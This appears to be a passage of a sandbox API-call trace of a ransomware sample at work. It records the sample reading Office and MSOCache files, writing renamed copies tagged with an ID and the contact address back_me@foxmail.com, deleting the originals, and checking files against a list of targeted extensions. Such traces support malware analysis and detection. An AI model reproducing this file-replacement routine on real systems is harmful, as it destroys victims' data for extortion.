[0056.352] CloseHandle (hObject=0x194) returned 1 [0056.352] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.352] SetEndOfFile (hFile=0x214) returned 1 [0056.353] CloseHandle (hObject=0x214) returned 1 [0056.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.353] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf")) returned 1 [0056.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.354] lstrlenW (lpString=".doc") returned 4 [0056.354] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.354] lstrlenW (lpString=".docx") returned 5 [0056.354] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.354] lstrlenW (lpString=".pdf") returned 4 [0056.354] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.354] lstrlenW (lpString=".xls") returned 4 [0056.354] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.354] lstrlenW (lpString=".xlsx") returned 5 [0056.354] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.354] lstrlenW (lpString=".ppt") returned 4 [0056.354] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.354] lstrlenW (lpString=".zip") returned 4 [0056.354] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.354] lstrlenW (lpString=".rar") returned 4 [0056.354] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.354] lstrlenW (lpString=".bz2") returned 4 [0056.354] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.354] lstrlenW (lpString=".7z") returned 3 [0056.354] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.354] lstrlenW (lpString=".dbf") returned 4 [0056.354] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.354] lstrlenW (lpString=".1cd") returned 4 [0056.355] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0056.355] lstrlenW (lpString=".jpg") returned 4 [0056.355] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.358] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.359] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0056.359] GetLastError () returned 0x0 [0056.359] ReadFile (in: hFile=0x194, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x1d74, lpOverlapped=0x0) returned 1 [0056.635] WriteFile (in: hFile=0x1e4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x1d80, lpOverlapped=0x0) returned 1 [0056.636] ReadFile (in: hFile=0x194, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.636] WriteFile (in: hFile=0x1e4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.636] SetEndOfFile (hFile=0x1e4) returned 1 [0056.636] CloseHandle (hObject=0x1e4) returned 1 [0056.637] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.637] SetEndOfFile (hFile=0x194) returned 1 [0056.657] CloseHandle (hObject=0x194) returned 1 [0056.659] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.659] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf")) returned 1 [0057.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0057.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0057.154] lstrlenW (lpString=".doc") returned 4 [0057.154] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.154] lstrlenW (lpString=".docx") returned 5 [0057.154] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.154] lstrlenW (lpString=".pdf") returned 4 [0057.154] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.154] lstrlenW (lpString=".xls") returned 4 [0057.154] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.154] lstrlenW (lpString=".xlsx") returned 5 [0057.154] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.154] lstrlenW (lpString=".ppt") returned 4 [0057.154] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0057.154] lstrlenW (lpString=".zip") returned 4 [0057.154] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.154] lstrlenW (lpString=".rar") returned 4 [0057.154] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.154] lstrlenW (lpString=".bz2") returned 4 [0057.154] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.154] lstrlenW (lpString=".7z") returned 3 [0057.154] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0057.154] lstrlenW (lpString=".dbf") returned 4 [0057.154] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0057.154] lstrlenW (lpString=".1cd") returned 4 [0057.155] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0057.155] lstrlenW (lpString=".jpg") returned 4 [0057.155] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 Thread: id = 11 os_tid = 0x9a0 [0033.849] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x2e30048 [0033.849] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x2e40050 [0033.850] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7ed0 [0033.850] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x6) returned 0xb92b20 [0033.850] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7ea0 [0033.850] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x100000) returned 0x38c0020 [0033.850] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7ee8 [0033.850] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7ee8, Size=0x20) returned 0xb90220 [0033.850] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7ee8 [0033.850] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7ee8, Size=0x20) returned 0xb901f8 [0033.850] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.850] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.851] Wow64DisableWow64FsRedirection (in: OldValue=0x322ff58 | out: OldValue=0x322ff58*=0x0) returned 1 [0033.851] lstrlenW (lpString="kernel32.dll") returned 12 [0033.851] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90220 | out: hHeap=0xb10000) returned 1 [0033.851] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.851] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb901f8 | out: hHeap=0xb10000) returned 1 [0033.851] Sleep (dwMilliseconds=0x64) [0034.478] Sleep (dwMilliseconds=0x64) [0034.597] Sleep (dwMilliseconds=0x64) [0034.801] Sleep (dwMilliseconds=0x64) [0034.959] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.959] lstrlenW (lpString="Setup.xml") returned 9 [0034.959] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.188] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1608) returned 1 [0035.188] CloseHandle (hObject=0x1a0) returned 1 [0035.188] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.189] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.189] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.189] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.189] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.189] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.189] GetLastError () returned 0x0 [0035.189] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x648, lpOverlapped=0x0) returned 1 [0035.202] WriteFile (in: hFile=0x1a4, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x650, lpOverlapped=0x0) returned 1 [0035.203] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.203] WriteFile (in: hFile=0x1a4, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.203] SetEndOfFile (hFile=0x1a4) returned 1 [0035.204] CloseHandle (hObject=0x1a4) returned 1 [0035.204] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.204] SetEndOfFile (hFile=0x1a0) returned 1 [0035.205] CloseHandle (hObject=0x1a0) returned 1 [0035.205] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.205] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.205] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.205] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.205] lstrlenW (lpString=".doc") returned 4 [0035.205] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.205] lstrlenW (lpString=".docx") returned 5 [0035.205] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.205] lstrlenW (lpString=".pdf") returned 4 [0035.206] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.206] lstrlenW (lpString=".xls") returned 4 [0035.206] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.206] lstrlenW (lpString=".xlsx") returned 5 [0035.206] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.206] lstrlenW (lpString=".ppt") returned 4 [0035.206] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.206] lstrlenW (lpString=".zip") returned 4 [0035.206] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.206] lstrlenW (lpString=".rar") returned 4 [0035.206] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.206] lstrlenW (lpString=".bz2") returned 4 [0035.206] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.206] lstrlenW (lpString=".7z") returned 3 [0035.206] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.206] lstrlenW (lpString=".dbf") returned 4 [0035.206] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.206] lstrlenW (lpString=".1cd") returned 4 [0035.206] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.206] lstrlenW (lpString=".jpg") returned 4 [0035.206] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.206] lstrlenW (lpString=".doc") returned 4 [0035.206] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.206] lstrlenW (lpString=".docx") returned 5 [0035.206] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.207] lstrlenW (lpString=".pdf") returned 4 [0035.207] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.207] lstrlenW (lpString=".xls") returned 4 [0035.207] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.207] lstrlenW (lpString=".xlsx") returned 5 [0035.207] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.207] lstrlenW (lpString=".ppt") returned 4 [0035.207] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.207] lstrlenW (lpString=".zip") returned 4 [0035.207] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.207] lstrlenW (lpString=".rar") returned 4 [0035.207] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.207] lstrlenW (lpString=".bz2") returned 4 [0035.207] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.207] lstrlenW (lpString=".7z") returned 3 [0035.207] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.207] lstrlenW (lpString=".dbf") returned 4 [0035.207] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.207] lstrlenW (lpString=".1cd") returned 4 [0035.207] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.207] lstrlenW (lpString=".jpg") returned 4 [0035.207] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.207] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.207] lstrlenW (lpString="Setup.xml") returned 9 [0035.208] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.208] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=2362) returned 1 [0035.208] CloseHandle (hObject=0x1a0) returned 1 [0035.208] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.208] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.208] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.208] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.208] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.208] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.209] GetLastError () returned 0x0 [0035.209] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x93a, lpOverlapped=0x0) returned 1 [0035.210] WriteFile (in: hFile=0x1a4, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x940, lpOverlapped=0x0) returned 1 [0035.211] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.212] WriteFile (in: hFile=0x1a4, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.212] SetEndOfFile (hFile=0x1a4) returned 1 [0035.212] CloseHandle (hObject=0x1a4) returned 1 [0035.212] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.212] SetEndOfFile (hFile=0x1a0) returned 1 [0035.213] CloseHandle (hObject=0x1a0) returned 1 [0035.213] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.214] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.214] lstrlenW (lpString=".doc") returned 4 [0035.214] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.214] lstrlenW (lpString=".docx") returned 5 [0035.214] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.214] lstrlenW (lpString=".pdf") returned 4 [0035.214] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.214] lstrlenW (lpString=".xls") returned 4 [0035.214] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.214] lstrlenW (lpString=".xlsx") returned 5 [0035.214] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.214] lstrlenW (lpString=".ppt") returned 4 [0035.214] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.214] lstrlenW (lpString=".zip") returned 4 [0035.214] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.214] lstrlenW (lpString=".rar") returned 4 [0035.214] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.214] lstrlenW (lpString=".bz2") returned 4 [0035.214] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.214] lstrlenW (lpString=".7z") returned 3 [0035.214] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.214] lstrlenW (lpString=".dbf") returned 4 [0035.214] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.215] lstrlenW (lpString=".1cd") returned 4 [0035.215] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.215] lstrlenW (lpString=".jpg") returned 4 [0035.215] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.215] lstrlenW (lpString=".doc") returned 4 [0035.215] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.215] lstrlenW (lpString=".docx") returned 5 [0035.215] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.215] lstrlenW (lpString=".pdf") returned 4 [0035.215] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.215] lstrlenW (lpString=".xls") returned 4 [0035.215] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.215] lstrlenW (lpString=".xlsx") returned 5 [0035.215] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.215] lstrlenW (lpString=".ppt") returned 4 [0035.215] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.215] lstrlenW (lpString=".zip") returned 4 [0035.215] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.215] lstrlenW (lpString=".rar") returned 4 [0035.215] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.215] lstrlenW (lpString=".bz2") returned 4 [0035.215] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.215] lstrlenW (lpString=".7z") returned 3 [0035.215] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.215] 